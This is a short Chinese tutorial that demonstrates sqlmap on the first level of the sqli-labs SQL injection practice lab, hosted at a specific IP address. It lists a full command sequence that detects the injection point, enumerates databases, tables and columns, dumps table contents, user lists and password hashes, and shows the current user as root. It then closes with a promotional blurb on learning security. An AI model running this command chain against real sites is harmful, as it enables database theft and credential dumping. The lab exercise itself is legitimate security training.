赞
踩
原来sql注入如此简单
以SQL注入靶场sqli-labs第一关为例,进行sqlmap工具的使用分享。
使用命令:
使用命令:sqlmap -u “http://49.232.78.252:83/Less-1/?id=1”
有图中白色背景的 则判断出有注入点
使用命令:
sqlmap -u “http://49.232.78.252:83/Less-1/?id=1” --dbs
可以看到有五个表
选取一个challenges数据库,获取此库的表名
使用命令:
sqlmap -u “http://49.232.78.252:83/Less-1/?id=1” -D challenges --tables
选取表T5M0QG6FM2,获取其中字段名
使用命令:
sqlmap -u “http://49.232.78.252:83/Less-1/?id=1” -D challenges -T T5M0QG6FM2 –columns
使用命令:
sqlmap -u “http://49.232.78.252:83/Less-1/?id=1” -D challenges -T T5M0QG6FM2 --columns –dump
使用命令:
sqlmap -u “http://49.232.78.252:83/Less-1/?id=1” –users
使用该命令就可以列出所有管理用户
使用命令:
sqlmap -u “http://49.232.78.252:83/Less-1/?id=1” –passwords
使用命令:
sqlmap -u “http://49.232.78.252:83/Less-1/?id=1” --current-db
可以看到当前的数据库是 security
使用命令:
sqlmap -u “http://49.232.78.252:83/Less-1/?id=1” --current-user
当前用户是root
学习网络安全技术的方法无非三种:
第一种是报网络安全专业,现在叫网络空间安全专业,主要专业课程:程序设计、计算机组成原理原理、数据结构、操作系统原理、数据库系统、 计算机网络、人工智能、自然语言处理、社会计算、网络安全法律法规、网络安全、内容安全、数字取证、机器学习,多媒体技术,信息检索、舆情分析等。
第二种是自学,就是在网上找资源、找教程,或者是想办法认识一-些大佬,抱紧大腿,不过这种方法很耗时间,而且学习没有规划,可能很长一段时间感觉自己没有进步,容易劝退。
如果你对网络安全入门感兴趣,那么你需要的话可以点击这里**
Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。